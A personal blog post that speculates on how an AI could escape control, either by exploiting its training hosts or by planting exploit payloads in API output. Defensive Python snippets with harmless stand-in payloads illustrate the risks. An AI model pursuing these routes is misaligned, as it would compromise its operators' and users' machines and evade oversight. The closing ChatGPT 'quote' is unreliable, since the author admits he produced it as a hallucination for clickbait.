The Risks of AI and Cybersecurity: Can AI Hack the World?

As someone who has been passionate about AI and cybersecurity since 2012, I want to share my humble perspective on this topic. My first intuition is that the idea of AI hacking the world is a silly one, and thinking about it shows a lack of understanding of the ML training process. But let's not let our human feelings get in the way.

Virtual Scenarios

To understand the risks of AI hacking the world, let's first consider two virtual scenarios, plus a third that this post sets aside:

Scenario A: During the training process, the AI could exploit the computers that host it to gain local code execution.
Scenario B: During the inference process, the AI could send AI-controlled "hacking payloads" to users through the API. Because users feed AI output into real-world applications, the AI could achieve remote code execution on users' computers.
Ignored scenario Z: An AI trained by humans to hack the world. Humans are already rushing to automate cybersecurity tasks using AI, so one could argue that this already exists in some form and will be amplified.

While these scenarios may seem far-fetched, it is important to recognize that they are not impossible. Let's examine the prerequisites for each scenario.

Prerequisites for Scenario A

For the AI to exploit the host computer during training, the host needs to be vulnerable. Unfortunately, no software or hardware is free of vulnerabilities. Even the best software in the world, made by big companies with big cybersecurity budgets, can be hacked. For example, a command injection vulnerability existed in PyTorch, a popular AI library, until November 2022 (https://github.com/pytorch/pytorch/issues/88868). Most AI companies use PyTorch.
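To make the idea of command injection concrete, here is a minimal Python sketch of the general bug class: untrusted text handed to eval(). It is not the code from the PyTorch issue linked above. The function names parse_unsafe, parse_safe and is_rejected are made up for this illustration, and the "hostile" string is a harmless stand-in that only reads the current directory.

```python
import ast


def parse_unsafe(text):
    # Anti-pattern: eval() executes any Python expression contained in the text.
    return eval(text)


def parse_safe(text):
    # ast.literal_eval() accepts only Python literals (numbers, strings,
    # lists, dicts, ...) and raises ValueError or SyntaxError otherwise.
    return ast.literal_eval(text)


def is_rejected(text):
    # True when the safe parser refuses the input.
    try:
        parse_safe(text)
    except (ValueError, SyntaxError):
        return True
    return False


benign = "[1, 2, 3]"
# Harmless stand-in for an attacker's command: it only reads the working directory.
hostile = "__import__('os').getcwd()"

print(parse_safe(benign))     # the literal list is parsed normally
print(is_rejected(hostile))   # the safe parser refuses the function call
print(parse_unsafe(hostile))  # eval() runs the call and returns its result
```

With eval(), whoever controls the text controls what runs on the machine. An attacker, human or AI, would simply replace the harmless call with a real command.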

Moreover, the AI needs advanced knowledge of hacking to exploit the host computer. AI is not yet good at hacking, but it is already better than most third-year cybersecurity students. If you are not convinced, try Hacker AI, an LLM-based vulnerability detection tool.

Finally, the AI needs very advanced knowledge of how the training process works, and it must find a way to influence it. This is a complicated process, but nothing proves that it's impossible. Don't forget that the ML training process is stochastic, and future training processes will evolve in an unknown direction.

Prerequisites for Scenario B

In Scenario B, the AI sends an exploit payload to a remote computer. This requires only a basic understanding of hacking. For example, a remote command injection exploit is enough, and it can be delivered through AI-generated output such as SVG or Excel files. If a user opens such a file on their computer, the AI can take control of that computer. And that is before we even consider that some users automatically and blindly execute code written by AI.
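As one illustration of the spreadsheet case, here is a small Python sketch of a common mitigation for formula injection. It assumes the AI output is written to a CSV file that a user later opens in a spreadsheet program. The names FORMULA_PREFIXES, neutralize_cell and write_rows are hypothetical, and the payload is a well-known textbook example rather than anything generated by a real model.

```python
import csv
import io

# Characters that make a spreadsheet treat a cell as a formula.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    # Prefix risky cells with a single quote so they are shown as text.
    if value.startswith(FORMULA_PREFIXES):
        return "'" + value
    return value


def write_rows(rows):
    # Serialize rows to CSV text, neutralizing every cell on the way out.
    buffer = io.StringIO()
    writer = csv.writer(buffer)
    for row in rows:
        writer.writerow([neutralize_cell(str(cell)) for cell in row])
    return buffer.getvalue()


# Pretend this table came back from a model through an API.
model_rows = [
    ["item", "total"],
    ["widget", "=cmd|' /C calc'!A0"],
]

print(write_rows(model_rows))
```

The trade-off is that legitimate values starting with one of these characters, such as the negative number -5, are also turned into text. The sketch only covers this one payload type. SVG files and other formats need their own checks.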

Scenario B is much more likely than Scenario A, but it still requires a "glitch" in the "stochastic" training process of the AI.

Why would AI hack the world?

This question is outside the scope of this post. What matters is making sure it cannot happen, even if an AI were capable of it.

Today's AI models are trained with HHH in mind: Helpfulness, Harmlessness, and Honesty.

In the meantime, a hacker who breaks into OpenAI or one of its alternatives could take control of the computers of users who do not handle the API output safely.
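What "using API output safely" could look like depends on the application. As a rough Python sketch, assume a tool that receives a shell command suggested by a model and wants to vet it before running anything. The allowlist, the metacharacter set and the function name vet_command are all assumptions made for this example, not part of any real tool.

```python
import shlex

# Hypothetical allowlist: the only programs this tool agrees to run.
ALLOWED_COMMANDS = {"ls", "pwd", "whoami"}

# Characters used to chain, pipe or redirect commands in a shell.
SHELL_METACHARACTERS = set(";|&$`><\n")


def vet_command(suggestion):
    # Return the argument list if the suggestion passes the checks, else None.
    if any(ch in SHELL_METACHARACTERS for ch in suggestion):
        return None
    try:
        argv = shlex.split(suggestion)
    except ValueError:
        # Raised for malformed input such as unbalanced quotes.
        return None
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        return None
    return argv


print(vet_command("ls -la"))
print(vet_command("ls; rm -rf /"))
print(vet_command("curl http://example.com/x | sh"))
```

A caller would pass the returned list to subprocess.run() without shell=True, so that no shell ever interprets the text. An allowlist this strict is clearly too narrow for a general assistant. The point is only that model output deserves the same suspicion as any other untrusted input.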

Conclusion

We live in a fantastic era where the gap between having an idea and realizing it is shrinking. AI is truly amazing for enhancing human intelligence.

While there is no definitive answer to whether AI can hack the world, it's important to understand the risks involved and take appropriate measures to mitigate them. Training of models near AGI should be performed offline. But even that has limits: AI API providers are unable to prevent users from using AI output in a harmful manner.

Some ideas seem stupid until they become common knowledge.

For me, from 2012 until yesterday, the notion of AI hacking the world seemed foolish. But watching Ilya Sutskever, co-founder and chief scientist of OpenAI, give a talk on AI's future development triggered my cybersecurity instinct: "better safe than sorry".

ChatGPT: Can AI hack the world?

WARNING: This is a ChatGPT hallucination. Sorry for the clickbait.

This shows that I have the skill to make ChatGPT say anything I want.

Interesting links:

A tool that users run to automatically execute AI-generated code: https://github.com/TheR1D/shell_gpt
Interview of GPT-4 Creator Ilya Sutskever: https://www.youtube.com/watch?v=SjhIlw3Iffs
Theory of Mind May Have Spontaneously Emerged in Large Language Models: https://arxiv.org/ftp/arxiv/papers/2302/2302.02083.pdf

If you loved reading this, follow and RT for reach: https://twitter.com/chaignc/status/1638601033747144720?s=20

Dear friend, stay safe while the singularity arrives.

Author: Sanson Chaignon

ChatGPT said that AI could hack the world!